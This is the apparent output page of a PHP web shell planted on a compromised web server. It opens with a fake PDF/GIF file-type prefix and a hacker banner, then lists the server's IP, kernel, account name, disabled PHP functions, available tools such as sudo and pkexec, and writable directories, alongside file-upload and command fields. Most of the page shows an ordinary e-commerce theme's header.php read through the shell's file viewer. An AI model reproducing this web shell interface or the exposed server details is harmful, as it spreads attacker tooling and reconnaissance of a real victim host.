%PDF-1.7 GIF89;
ANDA PELER
Server IP : 5.161.254.237  /  Your IP : 216.73.216.30
Web Server : Apache
System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : stellasp ( 1131)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/stellasp/public_html/application/themes/default/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/stellasp/public_html/application/themes/default/views/header.php
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title><?php echo (!empty($seo_title))?$seo_title:$this->config->item('company_name'); ?></title>
<?php if(!empty($meta)):?>
	<?php echo $meta;?>
<?php else:?>
<meta name="Keywords" content="SEO TEXT">
<meta name="Description" content="SEO TEXT ">
<?php endif;?>
 

<link type="text/css" href="<?php echo base_url('js/jquery/theme/smoothness/jquery-ui-1.8.16.custom.css');?>" rel="stylesheet" />



<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/bootstrap.min.css');?>" rel="stylesheet" />
<link rel="stylesheet" href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/font-awesome.min.css');?>" />

<link rel="stylesheet" type="text/css" href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/default.css');?>" />
<link rel="stylesheet" type="text/css" href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/component.css');?>" />
 <link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/accordian-style.css');?>" rel="stylesheet" />
  
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/scroll-style.css');?>" rel="stylesheet" />
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/style-sheet.css');?>" rel="stylesheet" />
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/newstylesheet.css');?>" rel="stylesheet" />
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/style.css');?>" rel="stylesheet" />
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/css/responsive.css');?>" rel="stylesheet" />
<link href="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/magiczoom/magiczoom.css');?>" rel="stylesheet" type="text/css" media="screen"/>
   
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Oswald" />
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>

<script type="text/javascript" src="<?php echo base_url('js/jquery/jquery-ui-1.8.16.custom.min.js');?>">
</script>

<link type="text/css" href="http://www.jacklmoore.com/colorbox/example1/colorbox.css" rel="stylesheet" />
<script type="text/javascript" src="http://www.jacklmoore.com/colorbox/jquery.colorbox.js">
</script>
<script type="text/javascript" src="<?php echo base_url('js/jquery/equal_heights.js');?>">
</script>

<!--new work-->
<script type="text/javascript" src="<?php echo base_url('js/bootstrap.min.js');?>"> 
</script>

<script type="text/javascript" src="<?php echo base_url('js/modernizr.custom.js');?>"> 
</script>
<script type="text/javascript" src="<?php echo base_url('js/jquery.flexisel.js');?>"></script>

<script type="text/javascript" src="<?php echo base_url('gocart/themes/'.$this->config->item('theme').'/magiczoom/magiczoom.js');?>" >
</script>

<script type="text/javascript"> 
 
    $(document).ready(function(){ 	
		$('input:submit, input:button, button, .btn').button();
		$('input:text, input:password').addClass('input');
    }); 
 
</script>


<script type="text/javascript"> 
var $buoop = {} 
$buoop.ol = window.onload; 
window.onload=function(){ 
 try {if ($buoop.ol) $buoop.ol();}catch (e) {} 
 var e = document.createElement("script"); 
 e.setAttribute("type", "text/javascript"); 
 e.setAttribute("src", "https://browser-update.org/update.js"); 
 document.body.appendChild(e); 
} 
</script> 


<?php
//with this I can put header data in the header instead of in the body.
if(isset($additional_header_info))
{
	echo $additional_header_info;
}

?>
</head>


<body>


<header>
        <div class="header-top clearfix">
                <div class="container">
             <div class="col-md-3">
                    <div class="search-sec">
 <?php echo form_open('cart/search','id="searchform"');?>
<input type="search" name="term" id="input" class="form-control" value="" title="" placeholder="Search...">
<a href="#" onClick="$('#searchform').submit();"><i class="fa fa-search"></i></a>
</form>
                    </div>
                  </div>
                  <div class="col-md-2 col-md-offset-1"><div class="uan"> <a href="tel:+92111227275"><span>UAN 111-227-275</span></a></div></div>
                  <div class="col-md-3 ">
                   <?php
                $countries = $this->Location_model->get_countries_header_menu();
                ?>
                  <?php echo form_dropdown('country_top',$countries,'','id="country_top" class="form-control"');?>
                  </div>

                <div class="col-md-3">
               
                  <ul class="top-header-menu">
                   
 <?php if($this->Customer_model->is_logged_in(false, false)):?>
 
			
			<li><a href="<?php echo  site_url('secure/my_account');?>"><?php echo lang('my_account')?></a></li>
          
            <li><a href="<?php echo site_url('secure/logout');?>"><?php echo lang('logout');?></a></li>
            
			
		<?php else: ?>
        
            <li><a href="#" onClick="$('#myModal').modal('show');"><?php echo lang('login');?></a></li>
            <li><a href="<?php echo site_url('secure/register');?>"><?php echo 'Register';?></a></li>
            
		<?php endif; ?>
          
           <li>   
            <a href="<?php echo site_url('cart/view_cart');?>">
			<?php
			if ($this->go_cart->total_items()==0)
			{
				?>
                <img src="<?php echo base_url('images/header-cart.png');?>" alt="" class="top-cartimg">
                <span id="cart_item">0</span>
                <?php
				//echo lang('empty_cart');
			}
			else
			{
				if($this->go_cart->total_items() > 1)
				{
					?>
                <img src="<?php echo base_url('images/header-cart.png');?>" alt="" class="top-cartimg">
                <span id="cart_item" ><?=$this->go_cart->total_items()?></span>
                    <?php
					//echo sprintf (lang('multiple_items'), $this->go_cart->total_items());
				}
				else
				{
					?>
                <img src="<?php echo base_url('images/header-cart.png');?>" alt="" class="top-cartimg">
                <span id="cart_item" ><?=$this->go_cart->total_items()?></span>
                    <?php
					//echo sprintf (lang('single_item'), $this->go_cart->total_items());
				}
			}
			?>
			</a>
            </li>
            
                  </ul>
                </div>

                </div>
              </div>      
  

      <div class="main logo-sec">
        <div class="container">
        <div class="col-md-4">
        
        <div class="logo">
        <a href="<?php echo base_url();?>">
        <img src="<?php echo base_url('images/logo.png');?>"  alt="<?php echo $this->config->item('company_name'); ?>"/></a></div></div>
        <nav id="cbp-hrmenu" class="cbp-hrmenu">
          <ul >
            <li <?php if($this->uri->segment(1)==""){?> class="active" <?php } ?>><a href="<?php echo base_url();?>">Home</a></li>
            <li class="custom-sytle <?php if($this->uri->segment(1)=="new-arrivals"){?>active<?php } ?>">
<a href="<?php echo base_url('new-arrivals');?>">New Arrivals <img src="<?php echo base_url('images/hotdeal-top.png');?>" alt="" class="narival-mono"></a> </li>
            <li>
              <a href="#">Products</a>
              <div class="cbp-hrsub">
                <div class="cbp-hrsub-inner"> 
               
		
		<?php
		function display_categories($cats, $layer, $first='')
		{
			if($first)
			{
				echo '<ul'.$first.'>';
			}
			
			foreach ($cats as $cat)
			{   
			if($cat['category']->parent_id==0)
			{
               echo '<div><h4>'.$cat['category']->name.'</h4>'; 
			}
			else
			{
				?>
			 <li><a href="<?=site_url($cat['category']->slug)?>"><?=$cat['category']->name?></a></li>
             <?php
			}
				
		   	if (sizeof($cat['children']) > 0)
				{
					if($layer == 1)
					{
						$next = $layer+1;
						display_categories($cat['children'], $next, ' class=""');
					}
					else
					{
						$next = $layer+1;
						display_categories($cat['children'], $next, ' class=""');
					}
				}
		 
			}
			
			
			if($first)
			{
				echo '</ul></div>';
			}	
			
		}
			
		display_categories($this->categories, 1);
		
		?>

          


                </div><!-- /cbp-hrsub-inner -->
              </div><!-- /cbp-hrsub -->
            </li>
            <li <?php if($this->uri->segment(1)=="brand-ambassador"){?> class="active" <?php } ?>> <a href="<?php echo base_url('brand-ambassador');?>">Brand Ambassador</a> </li>
            <li> <a href="http://cawears.com/information.php?id=15">Media</a> </li>
            <li <?php if($this->uri->segment(1)=="contact-us"){?> class="active" <?php } ?>> <a href="<?php echo base_url('contact-us');?>">Contact Us</a></li>
          </ul>
        </nav>
        </div>
      </div> <!--end of nav-->
  </header>
 	

Anon7 - 2022
SCDN GOK